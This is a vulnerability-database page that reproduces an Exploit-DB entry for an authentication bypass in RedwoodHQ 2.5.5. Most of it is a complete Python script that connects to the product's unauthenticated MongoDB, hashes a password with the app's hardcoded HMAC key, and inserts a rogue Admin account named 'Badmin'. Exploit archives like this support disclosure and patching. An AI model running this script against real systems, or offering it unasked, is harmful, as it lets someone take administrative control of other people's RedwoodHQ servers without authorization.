Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RedwoodHQ 2.5.5 - Authentication Bypass

🗓️ 17 Jun 2019 00:00:00Reported by EthicalHCOPType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 336 Views

RedwoodHQ 2.5.5 Authentication Bypass, Create Admin User without Authenticatio

Code
# -*- encoding: utf-8 -*-
#!/usr/bin/python3

# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 	       14-june-2019
# Exploit Author:  EthicalHCOP
# Version: 	       2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link:   https://redwoodhq.com/redwood-download/
# Tested on: 	   Ubuntu and Windows.
# Twitter:	       @EthicalHcop
# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: 	   Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
# 
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have  her own Mongo Launcher. 
# The problem is that this vendor database doesn't require any authentication to read her data. 
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
# 
# POC:             https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
    message = bytes(Pass,encoding='utf8')
    secret = bytes('redwood',encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())

def DbConnect(ip,port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con

def DbDisconnect(con):
    con.close()

def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)

def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
    start()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jun 2019 00:00Current
7.4High risk
Vulners AI Score7.4
redwoodhqauthentication bypassadmin usermongodbvendorexploitubuntuwindowsethicalhcop
336